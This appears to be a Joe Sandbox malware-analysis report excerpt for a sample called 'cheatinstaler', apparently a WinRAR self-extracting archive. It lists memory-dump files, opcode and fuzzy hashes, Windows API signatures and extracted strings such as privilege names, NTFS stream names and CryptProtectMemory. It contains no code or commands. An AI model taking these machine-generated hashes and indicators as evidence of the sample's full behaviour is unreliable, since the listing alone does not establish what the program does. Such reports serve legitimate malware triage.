• Opcode Fuzzy Hash: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
• Instruction Fuzzy Hash: 1B010462F1868541FA11AF2AE49122DB361FB887A4FD44231E79C0BAA5DF2CE1408704
APIs
  • Part of subcall function 00007FF754571604: GetModuleHandleW.KERNEL32(?,?,?,00007FF754571573,?,?,?,00007FF75457192A), ref: 00007FF75457162B
• DloadProtectSection.DELAYIMP ref: 00007FF7545715C9
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: DloadHandleModuleProtectSection
• String ID:
• API String ID: 2883838935-0
• Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
• Instruction ID: 19326fda6268363fb262732befb645ec6786c6490a101c87cd4a1b5fbc80f291
• Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
• Instruction Fuzzy Hash: E7118A61D0950791FB68BF17A8F5770B391BF18389F9C0435DA0E463A1EE3CAA95CA20
APIs
  • Part of subcall function 00007FF7545540BC: FindFirstFileW.KERNELBASE ref: 00007FF75455410B
  • Part of subcall function 00007FF7545540BC: FindFirstFileW.KERNEL32 ref: 00007FF75455415E
  • Part of subcall function 00007FF7545540BC: GetLastError.KERNEL32 ref: 00007FF7545541AF
• FindClose.KERNELBASE(?,?,00000000,00007FF754560811), ref: 00007FF754553EFD
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: Find$FileFirst$CloseErrorLast
• String ID:
• API String ID: 1464966427-0
• Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
• Instruction ID: 859986facb258c858c9bcb36706334ba88e520eead939939742f53cc60e6d4e4
• Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
• Instruction Fuzzy Hash: 37F0816250824185EA10AFB6B5A02BD77609F16BB4F681374FA3D072C7CE2CD444C764
APIs
• FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF75455207E), ref: 00007FF7545520F6
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
• Instruction ID: 2f3cd10a91d710f6b97d6761f68aa068b5287938fd72725118b24911a64841ad
• Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
• Instruction Fuzzy Hash: 43F0A922A0464285FB24AF62D0953B9A760D714B78FDC4334F73C051D4DF28D4958B21
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
• Instruction ID: c7a75cb944358a9975700df45f9d4c67f9b6e84d257c87528739c47b4649c36b
• Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
• Instruction Fuzzy Hash: 9AF0D451A0924645FF547FA358E52B996906F847E4F9C5A30D96E862C2DE2CE6888230
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
• Instruction ID: 579ac676231ba9bdc1ca6e1083314fc4a1c84ae912bbd8ed8b5e7b36488abce9
• Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
• Instruction Fuzzy Hash: F1D0C922909841C2ED14AB3698A107C6250AF92735FE80720E63E816E1CF1E9496A721
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                  • Instruction ID: 0e1cd44f0b955c1791750d9c7b1596fe66366bd18d24044955961425e50f9a54
                                                                                  • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                  • Instruction Fuzzy Hash: B0C08C20F05502C1EA08AF27C8D942823A4FB40B04FB84034D10C81160CE2CC6EAA365
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 2659423929-3508440684
                                                                                  • Opcode ID: 86f3f34dae19e3e49c29d340f54b39a2d4150e9680d4af69a4817d617f67abfd
                                                                                  • Instruction ID: 0dc1ee152999734ab242c4cd2f5d59c0bba245e55da53fcc1c7e0eccd9b7f0d6
                                                                                  • Opcode Fuzzy Hash: 86f3f34dae19e3e49c29d340f54b39a2d4150e9680d4af69a4817d617f67abfd
                                                                                  • Instruction Fuzzy Hash: A362C462F1874285FB00EF76D4A42BDA371EB857A4FA84231DA6D57AD6DF38E184C310
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                  • String ID: rtmp
                                                                                  • API String ID: 3587137053-870060881
                                                                                  • Opcode ID: e1af406d9dd90cab9ebde2dc7b257a9c18519fdc4ea1c1791790fdf5b4aa1268
                                                                                  • Instruction ID: b0686a66eff674c228ffdaf2ffacdf33ed8a5cea148844b057536b47d45babe5
                                                                                  • Opcode Fuzzy Hash: e1af406d9dd90cab9ebde2dc7b257a9c18519fdc4ea1c1791790fdf5b4aa1268
                                                                                  • Instruction Fuzzy Hash: 9EF1C322F08A4291EA10EF66D4E41FDAB61FB853D4F981131FA4D47AA9EF3CD584C760
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1693479884-0
                                                                                  • Opcode ID: 42882c5e1b64cf364603feffb0a4dffa6fd5e54fa856c7804417c031547eb997
                                                                                  • Instruction ID: 38035251a9565e33b4ebdc116d7142fb6ee6512a13d6c5ce3f99e681167273a7
                                                                                  • Opcode Fuzzy Hash: 42882c5e1b64cf364603feffb0a4dffa6fd5e54fa856c7804417c031547eb997
                                                                                  • Instruction Fuzzy Hash: D3A1B562F15B5684FE10EF7AD8A42BCA361AF45BE4B984231EE1D17BD9DE3CE041C210
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3140674995-0
                                                                                  • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                  • Instruction ID: cca9566a1e1ae471e8c56b011f05716ca96d1fd354abff7d6e49c0e2fa483af1
                                                                                  • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                                  • Instruction Fuzzy Hash: 58313272609B818AEB609F65E8A03EDB364FB84754F984439DB4D47B98DF38D648C720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1239891234-0
                                                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                  • Instruction ID: 8bf847a311ebbfd892a4814d6b86ad2920bc271daa0cd0153084d9396645308a
                                                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                                  • Instruction Fuzzy Hash: 39316332608F8186E760DF26EC902AEB7A4FB84794F980135EA9D43B59DF3CD655CB10
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 47fe9767bcb5ae1d9a882eaa5a8596545d0350934ab6dbf56b44417d7b0c6152
                                                                                  • Instruction ID: e743fbd67c9187ee4f17789bd9cac3c2473acc29ac9300f5a5ed2d29b56f16e3
                                                                                  • Opcode Fuzzy Hash: 47fe9767bcb5ae1d9a882eaa5a8596545d0350934ab6dbf56b44417d7b0c6152
                                                                                  • Instruction Fuzzy Hash: 28B1E562F1468655EB10AF66D8A82EDA361FF857D4FA81231EA4D0BB99EF3CD540C310
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75457FAC4
                                                                                    • Part of subcall function 00007FF754577934: GetCurrentProcess.KERNEL32(00007FF754580CCD), ref: 00007FF754577961
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                  • String ID: *?$.
                                                                                  • API String ID: 2518042432-3972193922
                                                                                  • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                  • Instruction ID: b218fd85d9f10b5ad527d349813fed48917fdc5fcb62e979359f47532da4f582
                                                                                  • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                                  • Instruction Fuzzy Hash: AB51D663B15A5585EB10EFA398A04BDA7A4FB44BD4B984531EE1D17B89DE3CD1428320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1365068426-0
                                                                                  • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                  • Instruction ID: 43bdbb56bb29e37bac986ad44014222150a14d753d33bf86625af0bd0a5e4b18
                                                                                  • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                                  • Instruction Fuzzy Hash: FA01FF75A0C74282EB10AF63B8A417AA395FB89BC0F9C4034EA8D47B45DE3CE5059751
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                  Similarity
                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                  Similarity
                                                                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                  • String ID: STATIC
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 2721297748-1533471033
                                                                                  • Opcode ID: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                  • Instruction ID: eaebc4cb5d7379ddb8b82e55f2647d2e03b9b93eaab1d8dd4e57f80ecbb94aea
                                                                                  • Opcode Fuzzy Hash: d8862c3025e57af8a5778f9936a91020890481e3bad1d2e12bbb9941efaf755e
                                                                                  • Instruction Fuzzy Hash: 1A819F62F18A4295FB00EFB6D4A01EDB371AF447D4F980136DE1D1769AEE38E50AC360
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Text
                                                                                  • String ID: LICENSEDLG
                                                                                  • API String ID: 1601838975-2177901306
                                                                                  • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                  • Instruction ID: 9481e9b4741ae662074d2e19940b786173db2a0fbac83e3e9e2e4a04dbf90803
                                                                                  • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                  • Instruction Fuzzy Hash: BE418F22B0869292FB14AF13A8F4779A7A1AF85F81F9C4035D90E07B95CF3CE945C320
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
